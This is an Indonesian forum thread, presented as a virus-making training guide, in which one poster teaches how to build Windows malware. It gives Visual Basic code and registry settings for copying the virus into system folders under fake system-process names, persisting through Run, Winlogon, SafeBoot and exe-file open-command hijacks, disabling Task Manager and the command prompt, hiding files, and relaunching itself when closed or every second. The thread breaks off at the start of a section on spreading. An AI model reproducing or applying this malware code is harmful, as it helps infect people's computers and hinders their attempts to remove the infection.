+ Reply to Thread
Page 1 of 2 1 2 LastLast
Results 1 to 20 of 39

Thread: Panduan Pelatihan Pembuatan Virus..

  1. #1
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post Panduan Pelatihan Pembuatan Virus..

      Related Links
    Teman-teman yang mau berkreasi di dalam membuat virus...
    Ayo kita bergabung disini...
    Tapi satu pesan dari saya....
    Tetap harus hati2 aja ya.....
    Setiap kita membuat virus kita harus selalu waspada kalau2 nanti terjadi sesuatu ama komputer kita sendiri.....
    .....Maksudnya Jaga Komputer anda sendiri dulu dengan benar-benar..

    Thank's...

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  2. #2
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post Infeksi Sistem

    Jika kita tanpa sengaja menjalankan/membangkitkan suatu virus (Virus Komputer). Maka yang pasti dilakukan virus tersebut setelah bangkit dari tidurnya adalah menginfeksi system yang ada pada computer target agar virus tersebut melekat pada computer target. Sehingga meskipun komputer tersebut telah di-restart virus tersebut akan tetap aktif dikomputer target tersebut.

    Cara kerja virus menginfeksi system:
    1. Melakukan penggandaan ke system.
      Langkah pertama sekali yang dilakukan oleh kebanyakan virus ketika user
      menjalankan virus dikomputernya adalah melakukan penggandaan kesistem
      user tersebut. Proses penggandaan ke system tersebut berfungsi agar virus
      tetap aktif pada saat computer direstart. Biasanya hasil penggandaan ke
      system mempunyai nama yang hampir dengan nama file system dan ada juga
      yang sama dengan nama file system hanya saja lokasi file tersebut berbeda
      dengan file aslinya. Contoh (winlogon.exe, lsass.exe, services.exe, csrss.exe,
      iexplorer.exe, shell.exe, dll).
    2. Menyeting registry.
      Setelah virus tersebut berhasil menggandakan dirinya kesistem barulah virus
      tersebut menggunakan registry sebagai benteng pertahanan. Kok
      menggunakan registry, seharusnya virus kan mampu melindungi dirinya sendiri
      tanpa bantuan registry? Benar, Tapi meskipun begitu banyak sekali
      kemungkinan virus tersebut dapat ditanggulangi oleh Antivirus atau software
      sejenisnya. Tapi dengan meminjam bantuan registry dari system operasi maka
      virus tersebut tersebut dapat melindungi dirinya dengan sangat baik.
      Dikarenakan kunci system operasi ada pada registry. Dengan bantuan registry
      ini virus mampu menjalankan dirinya kedalam mode safe-mode ataupun
      kedalam mode safe-mode dos sekalipun. Dan melalukan pengaturan agar virus
      tersebut tetap dalam keadaan tidak terlihat sehingga menyulitkan user untuk
      menghapus virus tersebut secara manual.
    3. Mengaktifkan virus yang telah berada disistem.
      Setelah virus telah melakukan penggandaan ke system dan menyeting registry
      maka yang dilakukan virus selanjutnya adalah menjalankan virus telah ada
      disistem sehingga meskipun flashdisk atau pun disket tersebut dikeluarkan
      maka virus tersebut akan tetap aktif.

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  3. #3
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post Penggandaan Ke Sistem

    Ketika virus dijalankan oleh seseorang maka virus tersebut akan mulai melakukan aktivitasnya sebagai virus yaitu dengan melakukan penggandaan ke system computer (Infeksi ke system). Hal ini dilakukan agar virus tetap berada pada system meskipun sarana media penyebarannya telah dilepas, virus tersebut akan tetap aktif dengan cara mengaktifkan virus yang ter-copy di system sehingga system benarbenar telah terinfeksi oleh virus.

    Lokasi folder penggandaan virus pada system:
    1. Windows (Winnt untuk windows NT)
    2. System32 (System untuk windows 9x)
    3. Startup
    4. Application Data

    Lokasi diatas biasanya yang paling sering digunakan oleh virus. Mengapa
    harus lokasi tersebut? Karena untuk orang awam lokasi tersebut merupakan lokasi dimana file nya tidak boleh dihapus, karena hampir semua file yang ada pada folder tersebut merupakan file penting karena jika terjadi penghapusan terhadap file diperlukan oleh windows maka windows akan mengalami kerusakan. Dan hal ini dimanfaatkan oleh virus untuk melindungi dirinya.

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  4. #4
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post

    Selain lokasi folder virus juga melakukan perubahan extensi untuk menyamar
    agar virus tersebut sulit dicari.

    Extensi file yang sering digunakan oleh virus pada saat melakukan penggadaan pada system:
    1. EXE
    2. SCR
    3. COM
    4. PIF

    Extensi diatas semuanya memiliki cara akses yang sama. Meskipun terjadi
    perubahan extensi, virus tersebut tetap akan berjalan dengan normal. SCR digunakan virus untuk menyamar sebagai Screen Saver sehingga virus tersebut akan aktif jika Screen Saver aktif. Dan tentunya dengan melakukan sedikit perubahan pada registry agar virus tersebut menjadi Default pada Screen Saver.

    Agar penyamaran sukses virus juga menggunakan penamaan yang hampir
    sama dengan file system atau bahkan memang sama hanya saja lokasi file tersebut yang berbeda.

    Penamaan file yang sering digunakan virus pada system:
    1. winlogon.exe
    2. lsass.exe
    3. services.exe
    4. csrss.exe
    5. smss.exe
    6. svchost.exe
    7. System
    8. taskmgr.exe
    9. explorer.exe
    10. iexplorer.exe
    11. notepad.exe
    12. winword.exe

    Dengan menggunakan penamaan file seperti itu. Virus tersebut dapat membuat
    bingung orang terserang virus tersebut karena mereka tidak tahu apakah file tersebut benar-benar file system yang asli atau yang palsu (virus).

    Penamaan file yang bermasalah pada task manager adalah winlogon.exe,
    lsass.exe, services.exe, csrss.exe, smss.exe. Karena file tersebut justru akan
    dilindungi oleh task manager sehingga tidak dapat matikan prosesnya oleh task
    manager.

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  5. #5
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post

    Berikut ini adalah kode sederhana untuk melakukan penggandaan ke system

    Penggunaan perintah FileCopy:

    FileCopy sumber,tujuan
    Code:
    Dim lokasi As String
    Dim namafile As String
    Private Sub Form_Load()
    With App
    lokasi = .Path & "\"
    namafile = .EXEName & ".exe"
    End With
    FileCopy lokasi & namafile, "C:\virus.exe"
    FileCopy lokasi & namafile, "C:\Windows\virus.com"
    FileCopy lokasi & namafile, "C:\Windows\virus.pif"
    FileCopy lokasi & namafile, "C:\Windows\System32\virus.scr"
    End Sub
    ----

    Dari perintah tersebut kita dapat mengetahui bahwa ketika virus dijalankan maka virus tersebut akan melakukan penggandaan diri pada drive C:

    C:\virus.exe
    C:\Window\virus.com
    C:\Windows\virus.pif
    C:\Windows\System32\virus.scr

    ----

    Berikut ini adalah proses penggandaan dengan menggunkan perintah API:

    Code:
    Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
    (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
    ByVal bFailIfExists As Long) As Long
    Dim lokasi As String
    Dim namafile As String
    Private Sub Form_Load()
    With App
    lokasi = .Path & "\"
    namafile = .EXEName & ".exe"
    End With
    CopyFile lokasi & namafile, "C:\virus.exe", 0
    CopyFile lokasi & namafile, "C:\Windows\virus.com", 0
    CopyFile lokasi & namafile, "C:\windows\virus.pif", 0
    CopyFile lokasi & namafile, "C:\windows\system32\virus.scr", 0
    End Sub
    -------

    Cara penggunaannya hampir sama. Jika kita penggunakan perintah API berarti kita akan menggunakan perintah yang terhubung langsung dengan Sistem Operasi, tetapi jika kita menggunakan perintah FileCopy itu berarti kita menggunakan perintah yang telah disediakan oleh visual basic. Setelah visual basic mengenal perintah perintah tersebut baru visual basic akan mengirimkan perintah ke system operasi. Berikut ini adalah kode penggandaan pada tempat-tempat yang dianggap penting oleh Windows. Siapkan satu form dengan 5 buah command button dan satu buah module.

    Ketikan pada Form1:

    Code:
    Dim lokasi As String
    Dim namafile As String
    Dim tujuan As String
    Private Sub Command1_Click()
    tujuan = GetSpecialfolder(CSIDL_DESKTOP)
    CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
    MsgBox tujuan
    End Sub
    Private Sub Command2_Click()
    tujuan = GetSpecialfolder(CSIDL_PERSONAL)
    CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
    MsgBox tujuan
    End Sub
    Private Sub Command3_Click()
    tujuan = GetSpecialfolder(CSIDL_STARTUP)
    CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
    MsgBox tujuan
    End Sub
    
    Private Sub Command4_Click()
    tujuan = GetWindowsPath
    CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
    MsgBox tujuan
    End Sub
    Private Sub Command5_Click()
    tujuan = GetSystemPath
    CopyFile lokasi & namafile, tujuan & "\" & "virus.exe", 0
    MsgBox tujuan
    End Sub
    Private Sub Form_Load()
    With App
    lokasi = .Path & "\"
    namafile = .EXEName & ".exe"
    End With
    End Sub
    -----

    Ketikan pada module:

    Code:
    Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
    (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
    ByVal bFailIfExists As Long) As Long
    Public Declare Function SHGetSpecialFolderLocation Lib "shell32.dll" _
    (ByVal hwndOwner As Long, ByVal nFolder As Long, pidl As ITEMIDLIST) As Long
    Public Declare Function SHGetPathFromIDList Lib "shell32.dll" Alias _
    "SHGetPathFromIDListA" (ByVal pidl As Long, ByVal pszPath As String) As Long
    Public Declare Function GetSystemDirectory Lib "kernel32.dll" Alias _
    "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
    Public Declare Function GetWindowsDirectory Lib "kernel32.dll" Alias _
    "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
    Public Declare Function CreateDirectory Lib "kernel32" Alias _
    "CreateDirectoryA" (ByVal lpPathName As String, _
    lpSecurityAttributes As SECURITY_ATTRIBUTES) As Long
    Public Type SHITEMID
    cb As Long
    abID As Byte
    End Type
    Public Type ITEMIDLIST
    mkid As SHITEMID
    End Type
    Public Type SECURITY_ATTRIBUTES
    nLength As Long
    lpSecurityDescriptor As Long
    bInheritHandle As Long
    End Type
    Enum SFolder
    CSIDL_DESKTOP = &H0 'menunjukkan folder virtual yang menyatakan root untuk
    'semua namespace (/Desktop)
    CSIDL_PROGRAMS = &H2 'menunjukkan folder sistem yang berisi grup program
    'user (/Programs)
    CSIDL_CONTROLS = &H3 'menunjukkan folder virtual yang berisi ikon-ikon
    'aplikasi Control Panel (/Control Panel)
    CSIDL_PRINTERS = &H4 'menunukkan folder virtual yang berisi printer-
    'printer yang diinstall (/Printers)
    CSIDL_PERSONAL = &H5 'menunjukkan folder sistem yang digunakan untuk
    'menyimpan dokumen umum user (/My Document)
    CSIDL_FAVORITES = &H6 'menunjukkan folder yang berisi item-item favorite
    'user (/Favorites)
    CSIDL_STARTUP = &H7 'menunjukkan folder yang berisi grup program StartUp
    'user (/Startup)
    CSIDL_RECENT = &H8 'menunjukkan folder sistem yang berisi dokumen-dokumen
    'yang sering digunakan (/Recent)
    CSIDL_SENDTO = &H9 'menunjukkan folder yang berisi item menu Send To
    '(/Send To)
    CSIDL_BITBUCKET = &HA 'menunjukkan folder sistem yang berisi objek file
    'pada RecycleBin user (/Recycle Bin)
    CSIDL_STARTMENU = &HB 'menunjukkan folder sistem yang berisi item-item
    'menu Start (/StartMenu)
    CSIDL_DESKTOPDIRECTORY = &H10 'menunjukkan folder sistem yang dapatkan
    'digunakan untuk menyimpan objek file secara
    'fisik pada desktop
    CSIDL_DRIVES = &H11 'menunjukkan folder yang berisi segala sesuatu pada
    'komputer lokal (/My Computer)
    CSIDL_NETWORK = &H12 'menunjukkan folder yang berisi objek link yang
    'kemungkinan ada pda folder virtual My Network Places
    '(/My Network Places)
    CSIDL_NETHOOD = &H13 'menunjukkan folder yang menyatakan root dari
    'hierarki namespace network (/NetHood)
    CSIDL_FONTS = &H14 'menunjukkan folder yang berisikan font (/FONT)
    CSIDL_TEMPLATES = &H15 'menunjukkan folder yang digunakan untuk menyimpan
    'dokumen template (/Template)
    End Enum
    'Get special folder
    Public Function GetSpecialfolder(JenisFolder As SFolder) As String
    Dim r As Long
    Dim IDL As ITEMIDLIST
    'get special folder
    r = SHGetSpecialFolderLocation(100, JenisFolder, IDL)
    If r = NOERROR Then
    'create buffer
    Path$ = Space$(512)
    'Get path from IDList(IDL)
    r = SHGetPathFromIDList(ByVal IDL.mkid.cb, ByVal Path$)
    'Remove chr$(0)
    GetSpecialfolder = Left$(Path, InStr(Path, Chr$(0)) - 1)
    Exit Function
    End If
    GetSpecialfolder = ""
    End Function
    'Get System Path
    Public Function GetSystemPath() As String
    On Error Resume Next
    Dim Buffer As String * 255
    Dim x As Long
    x = GetSystemDirectory(Buffer, 255)
    GetSystemPath = Left(Buffer, x) & "\"
    End Function
    'Get Windows Path
    Public Function GetWindowsPath() As String
    On Error Resume Next
    Dim Buffer As String * 255
    Dim x As Long
    x = GetWindowsDirectory(Buffer, 255)
    GetWindowsPath = Left(Buffer, x) & "\"
    End Function
    Dengan menggunakan perintah diatas kita dapat membuat kode untuk penggandaan
    pada folder yang dianggap penting oleh windows...

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  6. #6
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post Setting Registry

    Kali ini kita akan membahas lebih dalam tentang bagaimana cara virus
    menyeting registry. Dan settingan registry seperti apa yang biasa dilakukan virus.
    Virus yang berjalan pada system operasi windows tak dapat lepas dari bantuan registry yang dapat membuat virus tersebut mampu memiliki daya tahan yang sangat kuat sehingga sulit sekali untuk dimusnahkan. Registry dimanfaatkan virus sebagai suatu tameng atau benteng pertahanan yang dapat melindunginya dari berbagai serangan-serangan yang dapat membuat dirinya (virus) musnah dari computer yang telah terinfeksi.
    Misalkan kita telah berhasil mematikan suatu virus dengan menggunakan
    program task manager ataupun program sejenisnya tanpa melakukan pembersihan pada registry. Dimana virus telah memasang suatu kunci pada registry yang akan mengaktifkan dirinya jika user menjalankan suatu aplikasi, maka sudah bisa pastikan bahwa virus tersebut akan aktif kembali.
    Fungsi untuk menyeting registry yang digunakan oleh virus tidak banyak virus
    hanya memerlukan suatu fungsi untuk membuat kunci (Biasanya DWORD dan
    STRING) dan menghapus suatu kunci resgitry (Biasanya jarang digunakan).

    Code Pembuatan Key DWORD Pada Registry:
    Code:
    Public Function CreateDwordValue(hKey As REG, Subkey As String, _
    strValueName As String, dwordData As Long) As Long
    On Error Resume Next
    Dim ret As Long
    ‘Buka Key
    RegCreateKey hKey, Subkey, ret
    ‘Buat Key Dword Value
    CreateDwordValue = RegSetValueEx(ret, strValueName, 0, _
    REG_DWORD, dwordData, 4)
    ‘Tutup Key
    RegCloseKey ret
    End Function
    Code Pembuatan Key STRING Pada Registry:
    Code:
    Public Function CreateStringValue(hKey As REG, Subkey As String, _
    RTypeStringValue As TypeStringValue, strValueName As String, _
    strData As String) As Long
    On Error Resume Next
    Dim ret As Long
    ‘Buka Key
    RegCreateKey hKey, Subkey, ret
    ‘Buat Key String Value
    CreateStringValue = RegSetValueEx(ret, strValueName, 0, _
    RTypeStringValue, ByVal strData, Len(strData))
    ‘Tutup Key
    RegCloseKey ret
    End Function
    Code Penghapus Key:
    Code:
    Public Function DeleteKey(hKey As REG, Subkey As String) As Long
    On Error Resume Next
    Dim ret As Long
    ‘Buka Key
    RegCreateKey hKey, Subkey, ret
    'Hapus key
    RegDeleteKey Result, ""
    'Tutup handle
    RegCloseKey Result
    End Function

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  7. #7
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post

    Macam-macam setingan registry yang dibuat virus:
    1. Pada key Run.
      Key ini digunakan virus agar virus aktif pada saat windows melakukan logon.
      Contoh:
      Code:
      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
      Jenis Nilai : String
      Nama Kunci : Virus
      Nilai : C:\Windows\Virus.exe
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      Jenis Kunci : String
      Nama Kunci : Virus
      Nilai : C:\Windows\Virus.exe
      Penamaan suatu nama kunci dan nilai dapat anda ganti dan disesuaikan
      dengan apa yang anda buat
    2. Pada Key Explorer.
      Key ini digunakan virus untuk melindungi dirinya agar tetap tersembunyi. Virus
      dapat melakukan berbagai manipulasi explorer pada key ini.
      Contoh:
      Code:
      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Poli
      cies\Explorer\
      Jenis Nilai : DWORD
      Nama Kunci : NoFolderOptions
      Nilai : 1
    3. Pada Key System.
      Key ini juga digunakan virus untuk melindungi dirinya. Dengan key ini virus
      dapat menonaktifkan TaskManager dan Registry.
      Contoh:
      Code:
      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Poli
      cies\System\
      Jenis Nilai : DWORD
      Nama Kunci : DisableTaskMgr
      Nilai : 1
      HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\
      Jenis Nilai: DWORD
      Nama Kunci: DisableCMD
      Nilai: 1
    4. Pada Key Winlogon.
      Key ini digunakan virus untuk mengaktifkan dirinya sebelum/sesudah tampilan
      windows keluar.
      Contoh:
      Code:
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
      NT\CurrentVersion\Winlogon
      Jenis Nilai : String
      Nama Kunci : Shell
      Nilai : Explorer.exe "C:\Windows\IExplorer.exe"
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
      NT\CurrentVersion\Winlogon
      Jenis Kunci : String
      Nama Kunci : Userinit
      Nilai :
      C:\Windows\System32\userinit.exe,C:\Windows\IExplorer.exe
    5. Pada Key Dekstop.
      Key ini digunakan virus sebagai sarana penyamaran virus sebagai screen
      saver sehingga pada screen saver berjalan bukan screen saver yang berjalan
      tapi melainkan virus yang berjalan.
      Contoh:
      Code:
      HKEY_CURRENT_USER\Control Panel\Desktop\
      Jenis Kunci : String
      Nama Kunci : SCRNSAVE.EXE
      Nilai : C:\Windows\System32\virus.SCR"
      HKEY_CURRENT_USER\Control Panel\Desktop\
      Jenis Kunci : String
      Nama Kunci : ScreenSaverIsSecure
      Nilai : 0
      HKEY_CURRENT_USER\Control Panel\Desktop
      Jenis Kunci : String
      Nama Kunci : ScreenSaveTimeOut
      Nilai : 600
    6. Pada Key AeDebug.
      Key ini hampir sama seperti screen saver hanya saja, jika terjadi suatu debug
      pada windows maka tanpa sadar windows telah menjalankan virus.
      Contoh:
      Code:
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
      NT\CurrentVersion\AeDebug
      Jenis Kunci : String
      Nama Kunci : Debugger
      Nilai : "C:\Windows\System32\Shell.exe"
      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
      NT\CurrentVersion\AeDebug
      Jenis Kunci : String
      Nama Kunci : Auto
      Nilai : 1
    7. Pada Key Command.
      Key ini digunakan virus agar virus selalu aktif. Fungsi pengaktifannya jika user
      menjalankan suatu aplikasi maka yang dijalankan pertama kali adalah virus
      baru virus tersebut akan menjalankan aplikasi tersebut agar tidak
      mencurigakan. Dengan key ini virus memegang akses penuh terhadap suatu
      aplikasi. Virus dapat menjalankan suatu apikasi yang dia jalankan atau pun
      sebaliknya.
      Contoh:
      Code:
      HKEY_CLASSES_ROOT\exefile\shell\open\command
      Jenis Kunci : String
      Nama Kunci :
      Nilai : "C:\Windows\System32\shell.exe " "%1"%*
      HKEY_CLASSES_ROOT\lnkfile\shell\open\command
      Jenis Kunci : String
      Nama Kunci :
      Nilai : "C:\Windows\System32\shell.exe " "%1"%*
      HKEY_CLASSES_ROOT\piffile\shell\open\command
      Jenis Kunci : String
      Nama Kunci :
      Nilai : "C:\Windows\System32\shell.exe " "%1"%*
      HKEY_CLASSES_ROOT\batfile\shell\open\command
      Jenis Kunci : String
      Nama Kunci :
      Nilai : "C:\Windows\System32\shell.exe " "%1"%*
      HKEY_CLASSES_ROOT\comfile\shell\open\command
      Jenis Kunci : String
      Nama Kunci :
      Nilai : "C:\Windows\System32\shell.exe " "%1"%*
      Ket Nama Kunci = Kosong artinya (Default).
    8. Pada Key Safe Boot.
      Key ini digunakan virus agar virus tetap aktif. Pada saat windows berjalan pada
      mode safe-mode atau pun dos sehingga user tidak akan dapat menghapus
      virus ini pada mode safe mode.
      Contoh:
      Code:
      HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot
      Jenis Kunci : String
      Nama Kunci : AlternateShell
      Nilai : C:\Windows\Virus.exe
    9. Pada Key exefile.
      Key ini digunakan virus untuk melakukan manipulasi file agar virus tersebut
      tetap tersamar sehingga sulit untuk membedahkan mana file yang asli dan
      mana yang virus.
      Code:
      HKEY_CLASSES_ROOT\exefile
      Jenis Kunci : String
      Nama Kunci :
      Nilai : File Folder
      Nama Kunci = Kosong artinya (Default).
    10. Pada Key CabinetState.
      Key ini digunakan virus sebagai suatu sarana yang dapat membantu
      penyeberan jika user menggunakan windows explorer. Karena address bar
      windows explorer akan menampilkan alamat file yang sedang dibuka oleh user
      dengan lengkap.
      Contoh:
      Code:
      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Expl
      orer\CabinetState
      Jenis Kunci : DWORD
      Nama Kunci : FullPathAddress
      Nilai : 1
    11. Pada Key Advanced.
      Key ini digunakan virus untuk menyembunyikan dirinya. Agar settingan
      windows explorer tetap tidak akan menampilkan file yang dalam keadaan
      tersembunyi.
      Code:
      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Expl
      orer\Advanced\
      Jenis Kunci : DWORD
      Nama Kunci : HideFileExt
      Nilai : 1
      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Expl
      orer\Advanced\
      Jenis Kunci : DWORD
      Nama Kunci : Hidden
      Nilai : 0
      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Expl
      orer\Advanced
      Jenis Kunci : DWORD
      Nama Kunci : ShowSuperHidden
      Nilai : 0

    Anda dapat bereksplorasi lagi lebih banyak dengan registry agar dapat
    membuat suatu benteng keamanan yang sangat bagus sehingga virus tersebut sulit untuk ditaklukan.

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  8. #8
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post Pengaktifan Virus pada Sistem

    Jika virus telah melakukan penggandaan di system computer maka virus
    tersebut akan mengaktifkan hasil penggandaannya yang telah berada disistem,
    sehingga meskipun flashdisk atau pun media penyimpanan lainnya yang digunakan sebagai suatu sarana penyebaran virus tersebut dilepas maka virus tersebut akan tetap aktif.

    Untuk melakukan pengaktifan virus yang telah berada pada system computer
    virus tersebut hanya melakukan suatu perintah untuk menjalankan virus yang berada di sisem computer tersebut dengan perintah Shell atau dengan perintah ShellExecute.

    Pangaktifan akan dilakukan bila terjadi suatu proses atau pemanggilan suatu
    aplikasi. Virus biasanya akan memanggil dirinya kembali sehingga jika salah virus dimatikan dari task manager maka virus yang prosesnya belum dimatikan akan memanggilnya kembali. Jadi tehnik ini cukup menyulit sesorang membunuh virus tersebut.

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  9. #9
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post

    Code untuk melakukan pengaktifan:
    Code:
    Shell Lokasi+namafile,Window Style
    Berikut ini adalah contoh sederhana:
    Kamu siapkan terlebih dahulu satu buah command button.
    Code:
    Private Sub Command1_Click()
    Dim lokasi As String, namafile As String
    With App
    lokasi = .Path & "\"
    namafile = .EXEName
    End With
    Shell lokasi & namafile & ".exe", vbNormalFocus
    End Sub
    Jadi dengan perintah tersebut kita mampu menjalankan program apapun termasuk juga virus. Extensi nggak masalah karena jika membuat suatu file execute tanpa extensi, kita bisa menjalankannya dengan perintah shell tapi jika menggunakan langsung double-click pada windows tidak akan bisa.

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  10. #10
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post

    Selanjutnya membuat suatu program yang tidak bisa ditutup dengan menge-click
    tombol x pada windows:
    Code:
    Dim lokasi As String
    Dim namafile As String
    Private Sub Form_Load()
    With App
    lokasi = .Path & "\"
    namafile = .EXEName
    End With
    End Sub
    Private Sub Form_Unload(Cancel As Integer)
    Shell lokasi & namafile & ".exe", vbNormalFocus
    End Sub
    Dengan perintah diatas maka program tersebut akan melakukan pemanggilan dirinya kembali ketika ditutup dengan menekan tombol x di sudut kanan atas.
    Itu bisa terjadi dengan mengetikan perintah shell pada event Form_Unload

    Berikutnya code pengaktifan setiap detik
    Siapkan sebuah timer dengan Interval=1000 artinya akan menjalankan suatu perintah pada event timer setiap satu detik. 1 detik= 1000 millidetik.
    Code:
    Dim lokasi As String
    Dim namafile As String
    Dim detik As Integer
    Private Sub Form_Load()
    If App.PrevInstance Then End
    With App
    lokasi = .Path & "\"
    namafile = .EXEName
    End With
    End Sub
    Private Sub Timer1_Timer()
    Shell lokasi & namafile, vbNormalFocus
    End Sub
    Dengan mengisikan perintah pengaktifan pada event Timer maka program akan
    melakukan pengaktifan setiap satu detik.
    Disini kita juga harus menyiap penganan agar program hanya dapat berjalan sekali saja, dengan perintah:
    Code:
    If App.PrevInstance Then End
    Pada code berikut program akan melakukan pengaktifan jika suatu program
    mendapatkan focus:
    Code:
    Private Declare Function GetForegroundWindow Lib "user32" () As Long
    Dim GFW As Long
    Dim PrevGFW As Long
    Dim lokasi As String
    Dim namafile As String
    Private Sub Form_Load()
    With App
    If .PrevInstance Then End
    lokasi = .Path & "\"
    namafile = .EXEName & ".exe"
    End With
    End Sub
    Private Sub Timer1_Timer()
    GFW = GetForegroundWindow
    If GFW <> Me.hWnd And PrevGFW <> GFW Then
    Shell lokasi & namafile, vbNormalFocus
    PrevGFW = GFW
    End If
    End Sub
    
    Private Declare Function GetForegroundWindow Lib "user32" () As Long
    GetForegroundWindow digunakan untuk mendapatkan nilai handle dari suatu
    objek/program yang mendapatkan focus.
    Setelah nilai handle tersebut didapat maka akan dilakukan pengecekan apakah handle tersebut tidak sama dengan diri sendiri dan handle sebelumnya jika tidak sama jalankan proses pengaktifan.
    Berikut ini adalah kode pengaktifan yang baik:
    Code:
    Private Declare Function GetForegroundWindow Lib "user32" () As Long
    Dim GFW As Long
    Dim PrevGFW As Long
    Dim lokasi As String
    Dim namafile
    Private Sub Form_Load()
    namafile = Array("virus1.exe", "virus2.exe", App.EXEName & ".exe")
    If App.PrevInstance Then End
    lokasi = App.Path & "\"
    If Dir(lokasi & namafile(0)) = "" Or Dir(lokasi & namafile(1)) = "" Then
    FileCopy lokasi & namafile(2), lokasi & namafile(0)
    FileCopy lokasi & namafile(2), lokasi & namafile(1)
    End If
    End Sub
    Private Sub Timer1_Timer()
    GFW = GetForegroundWindow
    If Me.hWnd <> GFW And PrevGFW <> GFW Then
    Shell App.Path & "\" & namafile(0), vbNormalFocus
    Shell App.Path & "\" & namafile(1), vbNormalFocus
    PrevGFW = GFW
    End If
    End Sub
    Private Sub Form_Unload(Cancel As Integer)
    Shell lokasi & namafile(0), vbNormalFocus
    Shell lokasi & namafile(1), vbNormalFocus
    End Sub
    Pertama kali ketika virus dijalankan sang virus akan menduplikat dirinya dengan nama Virus1.exe dan Virus2.exe yang diambil dari Array.
    Code:
    namafile = Array("virus1.exe", "virus2.exe", App.EXEName & ".exe")
    Penduplikatan dilakukan dengan perintah:
    Code:
    FileCopy lokasi & namafile(2), lokasi & namafile(0)
    FileCopy lokasi & namafile(2), lokasi & namafile(1)
    Setelah itu virus akan menjalankan hasil duplikat tersebut setiap terjadi perubahan nilai handle.
    Code:
    GFW = GetForegroundWindow
    If Me.hWnd <> GFW And PrevGFW <> GFW Then
    Shell App.Path & "\" & namafile(0), vbNormalFocus
    Shell App.Path & "\" & namafile(1), vbNormalFocus
    PrevGFW = GFW
    End If
    Virus akan menjalakan hasil duplicate apabila virus tersebut ditutup.
    Code:
    Private Sub Form_Unload(Cancel As Integer)
    Shell lokasi & namafile(0), vbNormalFocus
    Shell lokasi & namafile(1), vbNormalFocus
    End Sub

    Jika hati adalah istana, maka cinta adalah singgasana
    Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
    Dan senyum seorang kekasih sepertimu bagiku adalah tahta

  11. #11
    Geuchik aap is on a distinguished road aap's Avatar
    Join Date
    Jan 2007
    Location
    Lhokseumawe
    Posts
    1,082

    Post Penyebaran

    Penyebaran merupakan salah satu dari cara kerja suatu virus, agar virus
